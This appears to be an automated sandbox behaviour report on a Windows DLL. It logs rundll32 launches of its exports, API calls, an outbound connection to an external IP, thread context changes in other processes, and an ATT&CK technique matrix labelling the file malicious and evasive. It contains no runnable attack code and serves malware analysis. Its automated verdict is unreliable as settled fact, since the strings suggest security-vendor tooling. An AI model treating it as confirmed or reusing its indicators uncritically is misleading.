Source: 10kmr9d7.dllBinary string: ??\\?\\\.\LPTCOMCONPRNAUXNUL/ntdll.dllchineseczechnorwegianslovakidProcessUtilsD:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\ProcessUtils.cpp :\Device\Mup\\\Device\LanmanRedirector\\\\\.\GlobalrootOpenProcess call with pid [%d] failed with error [%d]. Cannot get the process path!mb::common::system::ProcessUtils::GetProcessPathGetProcessImageFileName for [%d] failed with error [%d]. Cannot get the process path!NtQuerySystemInformationSHA1MD5SHA256SHA384SHA512**** Error 0x%x returned by BCryptOpenAlgorithmProvider - HashMbCommonSigCRYPTUSRD:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\CryptoUser.cppMbHashMemoryObjectLength**** Error 0x%x returned by BCryptGetProperty getting object length**** memory allocation failedHashDigestLength**** Error 0x%x returned by BCryptGetProperty getting hash length**** Invalid hash size: %u, need %u**** Invalid hash buffer: %p**** Error 0x%x returned by BCryptCreateHash**** Error 0x%x returned by BCryptHashData**** Error 0x%x returned by BCryptFinishHashRSAPUBLICBLOBFailed to import the public key - %xImportRsaPublicKeyXRSA**** Error 0x%x returned by BCryptOpenAlgorithmProviderVerifyTrusted****> Failed to import public key - %xKaseya LimitedKaseya certificate is trusted!ConnectWise certificate is trusted!VerifyData**** Failed to import public key - %xVerify signature returns %xGetFileHash32Not A Valid Dos StubNot A Valid PE Executable**** Error getting memoryError calculating rest of data!!GetFileHash64
Source: classification engineClassification label: mal56.evad.winDLL@56/0@1/1
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180008770 CreateToolhelp32Snapshot,GetLastError,Sleep,CreateToolhelp32Snapshot,Module32FirstW,CloseHandle,OpenProcess,GetLastError,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetLastError,GetModuleHandleW,CloseHandle,VirtualQueryEx,CloseHandle,GetLastError,CloseHandle,CloseHandle,GetLastError,CloseHandle,6_2_0000000180008770
Source: C:\Windows\System32\rundll32.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: 10kmr9d7.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CancelAllOperations
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\10kmr9d7.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CancelAllOperations
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Create
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Destroy
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_CancelAllOperations
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Create
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Destroy
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetTxtReplaceData
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueReplaceData
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueDeleteData
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetBasicData
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_Delete
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ShutdownTargetDLL
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetMaxLogLevel
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetLogCallback
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActionsV2
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActions
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessPendingActionsAfterReboot
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_PrepareUpdate
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_IsDLLNewlyLoaded
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_InitTargetDLL
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMinorAPIVersion
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMajorAPIVersion
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreatsV2
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreats
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_FinishUpdate
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CancelAllOperationsJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CreateJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_DestroyJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_CancelAllOperationsJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_CreateJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_DestroyJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetTxtReplaceDataJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueReplaceDataJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueDeleteDataJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetBasicDataJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_DeleteJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ShutdownTargetDLLJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetMaxLogLevelJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetLogCallbackJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActionsV2Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActionsJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessPendingActionsAfterRebootJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_PrepareUpdateJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_IsDLLNewlyLoadedJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_InitTargetDLLJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMinorAPIVersionJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMajorAPIVersionJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreatsV2Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreatsJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_FinishUpdateJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: 10kmr9d7.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: 10kmr9d7.dllStatic PE information: Image base 0x180000000 > 0x60000000
Source: 10kmr9d7.dllStatic file information: File size 2449408 > 1048576
Source: 10kmr9d7.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x143800
Source: 10kmr9d7.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 10kmr9d7.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 10kmr9d7.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 10kmr9d7.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 10kmr9d7.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 10kmr9d7.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 10kmr9d7.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\JENKINS\workspace\N_CleanActions\bin\x64\Release\ActionsShim.pdb source: rundll32.exe, 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.3272319252.0000000180154000.00000002.00000001.01000000.00000003.sdmp, 10kmr9d7.dll
Source: 10kmr9d7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 10kmr9d7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 10kmr9d7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 10kmr9d7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 10kmr9d7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180008770 CreateToolhelp32Snapshot,GetLastError,Sleep,CreateToolhelp32Snapshot,Module32FirstW,CloseHandle,OpenProcess,GetLastError,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetLastError,GetModuleHandleW,CloseHandle,VirtualQueryEx,CloseHandle,GetLastError,CloseHandle,CloseHandle,GetLastError,CloseHandle,6_2_0000000180008770
Source: 10kmr9d7.dllStatic PE information: real checksum: 0x227cd1 should be: 0x25c48f
Source: 10kmr9d7.dllStatic PE information: section name: _RDATA
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,9_2_000001B0A35D4D00
Source: C:\Windows\System32\rundll32.exeAPI coverage: 2.6 %
Source: C:\Windows\System32\loaddll64.exe TID: 1252Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800143C0 GetLogicalDriveStringsW,QueryDosDeviceW,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,6_2_00000001800143C0
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
Source: rundll32.exe, 0000000D.00000002.2114413384.000002771D968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt?jP
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}7
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD99000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.2157253061.000001B0A1B26000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3272959794.000001B0A1B21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000002.3273047761.000002357AD99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000001A.00000002.2116556383.0000015FD8378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvU
Source: rundll32.exe, 00000004.00000002.2017147384.000001F832DF8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2110636588.000002697B658000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2112934934.000002177F5A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2110665237.000001A88B888000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2117187690.0000019E30E68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000014.00000002.2117481002.0000023524F98000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2117589113.000001B655BD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.2116056288.000001855C971000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2117327755.00000208B6241000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.2116564892.000002698DBD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.2116190139.000002076DBA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: loaddll64.exe, 00000000.00000002.2113990565.0000020B53D0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
Source: rundll32.exe, 00000003.00000002.2017068075.0000025F28EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll
Source: rundll32.exe, 00000007.00000002.2077807792.000001F951EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2116391665.000002106E6B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu
Source: rundll32.exe, 00000008.00000002.2111797184.00000208DCF88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
Source: rundll32.exe, 0000000E.00000002.2116700449.000001C4E0D91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001B.00000002.2117323033.000001C7CF781000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<<
Source: rundll32.exe, 0000000F.00000002.2116577454.0000016CEFDF1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2117010439.00000210A1D41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2117398894.00000201FF071000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==
Source: rundll32.exe, 00000010.00000002.2116560361.00000236B7808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
Source: rundll32.exe, 00000019.00000002.2116239016.0000029E3E5C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35BCCE0 LdrGetProcedureAddress,9_2_000001B0A35BCCE0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180107848 GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_0000000180107848
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180107848 GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_0000000180107848
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180008770 CreateToolhelp32Snapshot,GetLastError,Sleep,CreateToolhelp32Snapshot,Module32FirstW,CloseHandle,OpenProcess,GetLastError,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetLastError,GetModuleHandleW,CloseHandle,VirtualQueryEx,CloseHandle,GetLastError,CloseHandle,CloseHandle,GetLastError,CloseHandle,6_2_0000000180008770
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180115DC0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0000000180115DC0
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180106F64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000180106F64
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35C77E0 RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler,9_2_000001B0A35C77E0

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 62.192.173.45 443Jump to behavior
Source: C:\Windows\System32\rundll32.exeThread register set: target process: 5812Jump to behavior
Source: C:\Windows\System32\rundll32.exeThread register set: target process: 5812Jump to behavior
Source: C:\Windows\System32\rundll32.exeThread register set: target process: 3480Jump to behavior
Source: C:\Windows\System32\rundll32.exeThread register set: target process: 3480Jump to behavior
Source: C:\Windows\System32\rundll32.exeThread register set: 5812 1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,6_2_0000000180130228
Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_000000018012FDA8
Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180107684 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_0000000180107684
Source: C:\Windows\System32\rundll32.exeCode function: 9_2_000001B0A35D4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,9_2_000001B0A35D4D00
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
311
Process Injection
11
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services11
Archive Collected Data
21
Encrypted Channel
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
311
Process Injection
LSASS Memory21
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager11
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32
LSA Secrets1
Account Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials1
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync1
System Network Configuration Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
File and Directory Discovery
